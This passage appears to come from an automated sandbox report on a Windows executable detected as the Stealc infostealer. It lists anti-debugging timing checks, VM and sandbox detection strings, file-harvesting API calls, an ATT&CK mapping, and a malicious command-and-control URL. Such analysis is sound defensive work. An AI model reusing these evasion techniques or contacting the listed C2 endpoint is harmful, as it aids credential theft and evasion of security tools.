                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2303 second address: 7F2307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEC04 second address: 7FEC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E41h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEC26 second address: 7FEC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB353 second address: 7FB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB357 second address: 7FB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C98A second address: 80C99E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCA94C93E36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C99E second address: 80C9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FCA9461846Ch 0x0000000f je 00007FCA94618466h 0x00000015 pushad 0x00000016 jmp 00007FCA94618479h 0x0000001b jnp 00007FCA94618466h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C9D7 second address: 80C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C9E2 second address: 80C9EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C9EF second address: 80C9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C5C7 second address: 81C5D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94618466h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B4E2 second address: 81B539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FCA94C93E3Dh 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E45h 0x00000012 jnc 00007FCA94C93E36h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jp 00007FCA94C93E4Ch 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FCA94C93E44h 0x00000028 jo 00007FCA94C93E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B96F second address: 81B975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BDAB second address: 81BDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E48h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BDC7 second address: 81BDD1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BDD1 second address: 81BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF62 second address: 81BF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF68 second address: 81BF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FCA94C93E36h 0x00000012 popad 0x00000013 jmp 00007FCA94C93E44h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BF8F second address: 81BFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA94618478h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C2A6 second address: 81C2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206B9 second address: 8206BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206BD second address: 8206C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206C3 second address: 8206C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820998 second address: 82099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82099C second address: 8209DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618477h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820A8A second address: 820A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820CED second address: 820CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820CF1 second address: 820D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E3Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FCA94C93E3Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237AD second address: 8237B3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237B3 second address: 8237B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237B8 second address: 8237BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237BE second address: 8237C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60299 second address: 4F60312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCA94618470h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FCA94618471h 0x00000017 or cl, 00000006h 0x0000001a jmp 00007FCA94618471h 0x0000001f popfd 0x00000020 call 00007FCA94618470h 0x00000025 mov dl, cl 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FCA94618474h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60312 second address: 4F60318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60318 second address: 4F60338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCA94618471h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60338 second address: 4F60359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 9Dh 0x00000005 mov eax, 7AF13A5Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f call 00007FCA94C93E40h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5A1A9C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 745B04 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7C6992 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A754D rdtsc 0_2_005A754D
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00354910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0034DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0034E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0034ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00354570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0034BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0034F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00353EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00341160 GetSystemInfo,ExitProcess,0_2_00341160
                Source: file.exe, file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareH
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13250
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13253
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13272
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13264
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13304
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A754D rdtsc 0_2_005A754D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,000000000_2_003445C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00359860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359750 mov eax, dword ptr fs:[00000030h]0_2_00359750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00357850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00359600
                Source: file.exeBinary or memory string: ["kProgram Manager
                Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ["kProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00357B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00356920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00357850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00357A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37=file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php=file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php6file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phphfile.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1540694
                          Start date and time:2024-10-24 01:09:04 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 4s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 86
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
